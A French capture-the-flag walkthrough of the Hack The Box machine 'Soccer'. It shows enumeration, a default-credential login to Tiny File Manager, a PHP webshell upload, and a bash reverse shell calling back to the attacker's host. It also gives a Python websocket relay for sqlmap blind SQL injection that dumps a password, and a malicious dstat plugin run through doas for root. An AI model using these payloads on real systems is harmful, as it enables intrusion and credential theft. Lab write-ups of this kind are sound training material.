Bonjour à tous, aujourd’hui, une box Linux facile appelée Soccer.
Comme d’habitude, on commence par un nmap.
nmap -p- --min-rate 10000 10.10.11.194
Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-04 13:32 EDT
Nmap scan report for 10.10.11.194
Host is up (0.093s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9091/tcp open xmltec-xmlmail
Nous avons donc 3 ports :
• un port SSH
• un port HTTP
• et un port 9091 identifié comme xlmtec-xmlmail
Le site web nous redirige vers soccer.htb.
Nous commençons par faire du brute force de sous-domaine via ffuf.
fuf -u http://10.10.11.194 -H "Host: FUZZ.soccer.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.194
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.soccer.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 427 req/sec :: Duration: [0:00:47] :: Errors: 0 ::
Nous n’avons aucun retour.
Nous allons donc brute-forcer les dossiers et fichiers cette fois-ci.
feroxbuster -u http://soccer.htb
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 147l 526w 6917c http://soccer.htb/
301 GET 7l 12w 178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301 GET 7l 12w 178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 1m 90021/90021 0s found:7 errors:0
[####################] - 57s 30000/30000 521/s http://soccer.htb/
[####################] - 56s 30000/30000 526/s http://soccer.htb/tiny/
[####################] - 56s 30000/30000 528/s http://soccer.htb/tiny/uploads/
Nous trouvons un dossier nommé “tiny”. C’est une instance de Tiny File Manager.
TinyFileManager est un gestionnaire de fichiers PHP basé sur le web. Il s’agit d’une application web simple, rapide et de petite taille en un seul fichier PHP qui peut être déposé dans n’importe quel dossier sur votre serveur, prête à être utilisée en plusieurs langues pour stocker, télécharger, éditer et gérer des fichiers et des dossiers en ligne via un navigateur web.
L’application fonctionne sur PHP 5.5+, elle permet la création de plusieurs utilisateurs et chaque utilisateur peut avoir son propre répertoire et un support intégré pour la gestion des fichiers texte avec cloud9 IDE et elle supporte la coloration syntaxique pour plus de 150+ langues et plus de 35+ thèmes.
Le fichier README de github nous donne les instructions suivantes pour configurer Tiny File Manager :
Téléchargez le ZIP contenant la dernière version de la branche master.
Copiez le fichier tinyfilemanager.php sur votre espace web – c’est tout 🙂 Vous pouvez également changer le nom du fichier « tinyfilemanager.php » en quelque chose d’autre, vous voyez ce que je veux dire.
Nom d’utilisateur/mot de passe par défaut : admin/admin@123 et user/12345.
Attention : Veuillez définir vos propres nom d’utilisateur et mot de passe dans $auth_users avant utilisation. Le mot de passe est chiffré avec password_hash(). pour générer un nouveau hash de mot de passe, cliquez ici.
Pour activer/désactiver l’authentification, mettez $use_auth à true ou false.
Ajoutez votre propre fichier de configuration config.php dans le même dossier pour l’utiliser comme fichier de configuration supplémentaire.
Pour travailler hors ligne sans ressources CDN, utilisez la branche hors ligne
Nous avons ici deux identifiants disponible,
- « admin » / « admin@123 » et
- « user » / « 12345 ».
Les deux jeux d’identifiants fonctionnent ici. Nous allons donc nous connecter en tant qu’administrateur.
Une fois connecté, la page affiche les fichiers qui font partie du site web du Soccer :
Nous pouvons uploader un fichier dans tiny/uploads
Nous creons ainsi un simple webshell PHP que nous uploadons dans tiny/uploads et le webshell execute bien du code.
<?php system($_REQUEST["cmd"]); ?>
curl http://soccer.htb/tiny/uploads/cmd.php -d 'cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Nous lancons nc en écoute sur 443 sur mon hôte, et nous déclenchons un reverse shell en envoyant un reverse shell bash :
curl http://soccer.htb/tiny/uploads/cmd.php -d 'cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.6/443 0>%261"'
nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.194 55140
bash: cannot set terminal process group (1048): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$
Maintenant que nous avons un pied dans la machine, il est temps d’énumérer pour élever nos privilèges.
Via linpeas, nous trouvons dans le fichier /etc/hosts un autre nom de domaine, soc-player.soccer.htb.
Le site ressemble exactement à l’autre, excepté qu’il y a d’autres options dans la barre de menu.
Il est mentionné sur la page de match que nous pouvons avoir un ticket gratuit si nous nous inscrivons.
Nous nous inscrivons donc sur le site.
Aprés l’inscription, nous somme redirigé vers /check, ou j’ai un ticket id.
Je peux entré un id de ticket dans le champ.
Lorsque l’on regarde plus attentivement via le navigateur les requetes envoyé. Nous voyons qu’il effectue une requete sur le port 9091 avec un status 101.
le code 101 est une repose de changement de protocole.
Le port 9091 est un serveur websocket.
Aprés des recherches, j’ai trouvé ceci.
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
Nous modifions légérement le code et lançons sqlmap.
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
ws_server = "ws://soc-player.soccer.htb:9091/"
def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
# For our case, format the payload in JSON
message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
data = '{"id":"%s"}' % message
ws.send(data)
resp = ws.recv()
ws.close()
if resp:
return resp
else:
return ''
def middleware_server(host_port,content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=',1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = 'No parameters specified!'
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
return
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")
try:
middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
pass
sqlmap -u "http://localhost:8081/?id=1"
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:08:52 /2022-12-19/
[15:08:52] [INFO] testing connection to the target URL
[15:08:52] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
[15:08:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:08:52] [INFO] testing if the target URL content is stable
[15:08:52] [INFO] target URL content is stable
[15:08:52] [INFO] testing if GET parameter 'id' is dynamic
[15:08:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[15:08:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[15:08:53] [INFO] testing for SQL injection on GET parameter 'id'
[15:08:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:08:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:08:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:08:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:08:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:08:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:08:55] [INFO] testing 'Generic inline queries'
[15:08:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:08:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:08:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:08:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:09:06] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[15:09:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:09:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:09:11] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:09:21] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[15:09:21] [INFO] checking if the injection point on GET parameter 'id' is a false positive
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:10:20] [INFO] the back-end DBMS is MySQL
[15:10:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[15:10:20] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'
[*] ending @ 15:10:20 /2022-12-19/
❯ sqlmap -u "http://localhost:8081/?id=1" --dbs
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:10:23 /2022-12-19/
[15:10:23] [INFO] resuming back-end DBMS 'mysql'
[15:10:23] [INFO] testing connection to the target URL
[15:10:23] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:10:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:10:23] [INFO] fetching database names
[15:10:23] [INFO] fetching number of databases
[15:10:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[15:10:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[15:10:37] [INFO] retrieved:
[15:10:42] [INFO] adjusting time delay to 1 second due to good response times
mysql
[15:11:02] [INFO] retrieved: information_schema
[15:12:12] [INFO] retrieved: performance_s
[15:13:11] [ERROR] invalid character detected. retrying..
[15:13:11] [WARNING] increasing time delay to 2 seconds
chema
[15:13:38] [INFO] retrieved: sys
[15:14:01] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[15:15:06] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'
[*] ending @ 15:15:06 /2022-12-19/
╭─ ~/Documents/hackthebox/machine/easy/soccer ✔ took 4m 44s 10.10.14.131 at 15:15:07
╰─ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db --tables IP A: 172.16.111.130
❯ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db --tables
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:15:22 /2022-12-19/
[15:15:22] [INFO] resuming back-end DBMS 'mysql'
[15:15:22] [INFO] testing connection to the target URL
[15:15:22] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:15:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:15:22] [INFO] fetching tables for database: 'soccer_db'
[15:15:22] [INFO] fetching number of tables for database 'soccer_db'
[15:15:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[15:15:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[15:18:15] [INFO] retrieved:
[15:18:25] [INFO] adjusting time delay to 1 second due to good response times
[15:18:30] [ERROR] invalid character detected. retrying..
[15:18:30] [WARNING] increasing time delay to 2 seconds
accoun
[15:19:15] [ERROR] invalid character detected. retrying..
[15:19:15] [WARNING] increasing time delay to 3 seconds
ts
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
[15:19:38] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'
[*] ending @ 15:19:38 /2022-12-19/
❯ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db -T accounts --dump
___
__H__
___ ___[']_____ ___ ___ {1.6.7#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:19:59 /2022-12-19/
[15:19:59] [INFO] resuming back-end DBMS 'mysql'
[15:19:59] [INFO] testing connection to the target URL
[15:19:59] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:19:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:19:59] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[15:19:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[15:20:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[15:20:39] [INFO] retrieved:
[15:20:50] [INFO] adjusting time delay to 1 second due to good response times
id
[15:20:56] [INFO] retrieved: email
[15:21:13] [INFO] retrieved:
[15:21:20] [ERROR] invalid character detected. retrying..
[15:21:20] [WARNING] increasing time delay to 2 seconds
userna
[15:22:07] [ERROR] invalid character detected. retrying..
[15:22:07] [WARNING] increasing time delay to 3 seconds
me
[15:22:25] [INFO] retrieved: passwor
[15:23:52] [ERROR] invalid character detected. retrying..
[15:23:52] [WARNING] increasing time delay to 4 seconds
d
[15:24:05] [INFO] fetching entries for table 'accounts' in database 'soccer_db'
[15:24:05] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db'
[15:24:05] [INFO] retrieved: 1
[15:24:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
player@player.htb
[15:28:19] [ERROR] invalid character detected. retrying..
[15:28:19] [WARNING] increasing time delay to 5 seconds
[15:28:19] [INFO] retrieved: 1324
[15:29:18] [INFO] retrieved: PlayerOftheMatch2
[15:34:13] [ERROR] invalid character detected. retrying..
[15:34:13] [WARNING] increasing time delay to 6 seconds
02
[15:34:46] [ERROR] invalid character detected. retrying..
[15:34:46] [WARNING] increasing time delay to 7 seconds
[15:35:02] [ERROR] invalid character detected. retrying..
[15:35:02] [WARNING] increasing time delay to 8 seconds
[15:35:19] [ERROR] invalid character detected. retrying..
[15:35:19] [WARNING] increasing time delay to 9 seconds
2
[15:35:38] [INFO] retrieved: player
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
[15:38:34] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/selim/.local/share/sqlmap/output/localhost/dump/soccer_db/accounts.csv'
[15:38:34] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'
[*] ending @ 15:38:34 /2022-12-19/
Nous decouvrons le mot de passe de l’utilisateur player. Nous pouvons ainsi switcher sur cette utilisateur.
www-data@soccer:/home/player$ su player -
Password:
player@soccer:~$
Continuons notre énumération. Nous découvrons que le binaire doas a les droits SUID.
find / -perm -4000 -type f 2>/dev/null
-rwsr-xr-x 1 root root 42K Nov 17 09:09 /usr/local/bin/doas
doas est une alternative à sudo que l’on trouve généralement sur les systèmes d’exploitation OpenBSD, mais qui peut être installée sur les systèmes d’exploitation Linux basés sur Debian comme Ubuntu.
En allant regarder les droits que nous avons éventuellement, nous voyons lque nous pouvons lancé /usr/bin/dstat en root sans mot de passe.
cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#doas
dstat est un outil permettant d’obtenir des informations sur le système. En regardant la page de manuel, il y a une section sur les plugins qui dit :
Bien que tout le monde puisse créer ses propres plugins dstat (et les contribuer), dstat est livré avec un certain nombre de plugins qui étendent considérablement ses capacités.
Tout en bas de la page, il y a une section sur les fichiers :
Chemins pouvant contenir des plugins dstat_*.py externes :
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/
Nous pouvons ainsi créer un plugin malicieux avec le nom
dstat_[plugin name].py
Nous pouvons ainsi créé un plugin python trés simple.
import os
os.system("/bin/bash")
Par chance, /usr/local/share/dstat est écrivable.
Nous plaçons donc notre plugin à l’intérieur de celui ci.
echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_0xdf.py
Et nous lançons doas.
player@soccer:~$ doas /usr/bin/dstat --0xdf
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
root@soccer:/home/player#
Et voila nous sommes root.